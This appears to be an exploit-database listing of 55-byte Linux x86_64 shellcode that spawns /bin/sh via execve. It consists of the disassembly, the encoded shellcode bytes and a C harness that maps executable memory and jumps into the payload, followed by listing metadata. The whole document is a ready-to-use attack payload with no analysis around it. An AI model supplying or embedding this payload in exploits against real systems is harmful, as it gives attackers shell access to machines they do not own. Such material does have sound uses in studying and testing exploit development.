Linux/x86_64 syscall(SYS_execve,"/bin/sh", ["/bin/sh", NULL], NULL) 55 bytes

#include <stdio.h>

#include <string.h>

#include <unistd.h>

#include <sys/mman.h>

#include <sys/types.h>

/*

* 400078: 0f 31 rdtsc

* 40007a: 48 31 c0 xor %rax,%rax

* 40007d: 48 31 db xor %rbx,%rbx

* 400080: 48 31 c9 xor %rcx,%rcx

* 400083: 48 31 d2 xor %rdx,%rdx

* 400086: 50 push %rax

* 400087: 50 push %rax

* 400088: 48 bb 2f 2f 62 69 6e movabs $0x68732f6e69622f2f,%rbx

* 40008f: 2f 73 68

* 400092: 53 push %rbx

* 400093: 48 8d 54 24 10 lea 0x10(%rsp),%rdx

* 400098: 48 8d 74 24 08 lea 0x8(%rsp),%rsi

* 40009d: 48 8d 3c 24 lea (%rsp),%rdi

* 4000a1: b0 3b mov $0x3b,%al

* 4000a3: 0f 05 syscall

* 4000a5: 48 31 c0 xor %rax,%rax

* 4000a8: 48 31 ff xor %rdi,%rdi

* 4000ab: b0 3c mov $0x3c,%al

* 4000ad: 0f 05 syscall

*/

/*

* Linux x86_64: 55 bytes syscall(SYS_execve, "/bin/sh", ["/bin/sh", NULL], NULL)

*

* tesla_ (gandung@ppp.cylab.cmu.edu)

*/

unsigned char *shellcode = "\x0f\x31\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2"

"\x50\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48"

"\x8d\x54\x24\x10\x48\x8d\x74\x24\x08\x48\x8d\x3c\x24\xb0"

"\x3b\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05";

unsigned char (*q)(size_t a, size_t b, size_t c)__attribute__((regparm(3)));

int main(void) {

q = mmap(NULL, sysconf(_SC_PAGESIZE), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0);

if ( q == MAP_FAILED ) {

fprintf(stderr, "Failed to map zero page. Check /proc/sys/vm/mmap_min_addr.\n");

return ( -1 );

}

memcpy(q, shellcode, (size_t)strlen(shellcode));

/* trampoline... :) */

__asm__ __volatile__("call *%%rax"

:

: "r"(q));

return (0);

}

EKU-ID: 5746	CVE:	OSVDB-ID:
Author: tesla_	Published: 2016-07-28	Verified:
Download:

Linux/x86_64 syscall(SYS_execve,"/bin/sh", ["/bin/sh", NULL], NULL) 55 bytes

Rating